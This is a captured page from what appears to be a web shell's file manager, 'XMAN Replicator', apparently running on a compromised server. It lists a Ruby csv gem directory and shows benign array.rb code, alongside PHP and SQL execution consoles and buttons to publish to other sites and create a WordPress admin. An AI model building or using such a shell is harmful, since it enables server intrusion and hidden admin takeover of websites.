🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
ruby34
/
share
/
gems
/
gems
/
csv-3.3.2
/
lib
/
csv
/
core_ext
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2026-05-14 17:40
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2026-05-14 17:40
🔄
🗑️
🗑️📁
⬇️
🔒
array.rb
195 B
-rw-r--r--
2026-04-20 12:16
✏️
🔄
🗑️
⬇️
🔒
string.rb
194 B
-rw-r--r--
2026-04-20 12:16
✏️
🔄
🗑️
⬇️
🔒
Edit: array.rb
class Array # Equivalent to CSV::generate_line(self, options) # # ["CSV", "data"].to_csv # #=> "CSV,data\n" def to_csv(**options) CSV.generate_line(self, **options) end end
Save
PHP Console
Execute
SQL Console
Execute